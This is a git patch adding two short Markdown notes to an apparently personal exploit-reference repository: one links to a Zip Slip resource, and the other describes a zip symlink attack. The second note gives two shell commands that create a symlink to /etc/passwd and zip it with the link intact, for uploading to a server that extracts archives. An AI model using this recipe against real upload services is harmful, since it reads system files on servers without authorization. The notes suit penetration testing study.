From ef401ad5ed364d44045ae072397df8f932b538fb Mon Sep 17 00:00:00 2001
From: gurkenhabicht <info@intheopen.org>
Date: Mon, 28 Aug 2023 19:45:37 +0200
Subject: [PATCH] bump

---
 Exploits/Compression/Zip Slip.md    |  3 +++
 Exploits/Compression/Zip Symlink.md | 16 ++++++++++++++++
 2 files changed, 19 insertions(+)
 create mode 100644 Exploits/Compression/Zip Slip.md
 create mode 100644 Exploits/Compression/Zip Symlink.md

diff --git a/Exploits/Compression/Zip Slip.md b/Exploits/Compression/Zip Slip.md
new file mode 100644
index 0000000..e311d54
--- /dev/null
+++ b/Exploits/Compression/Zip Slip.md	
@@ -0,0 +1,3 @@
+# Zip Slip
+
+* [snyk's ZipSlip repository](https://github.com/snyk/zip-slip-vulnerability)
diff --git a/Exploits/Compression/Zip Symlink.md b/Exploits/Compression/Zip Symlink.md
new file mode 100644
index 0000000..572cbcc
--- /dev/null
+++ b/Exploits/Compression/Zip Symlink.md	
@@ -0,0 +1,16 @@
+# Zip Symlink
+
+https://effortlesssecurity.in/zip-symlink-vulnerability/
+
+The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
+Create a symlink and put it in a zip file.
+
+```sh
+ln -s /etc/passwd link.name
+```
+
+compress it leaving symlinks intact
+
+```sh
+zip -r --symlinks mal.zip link.name
+```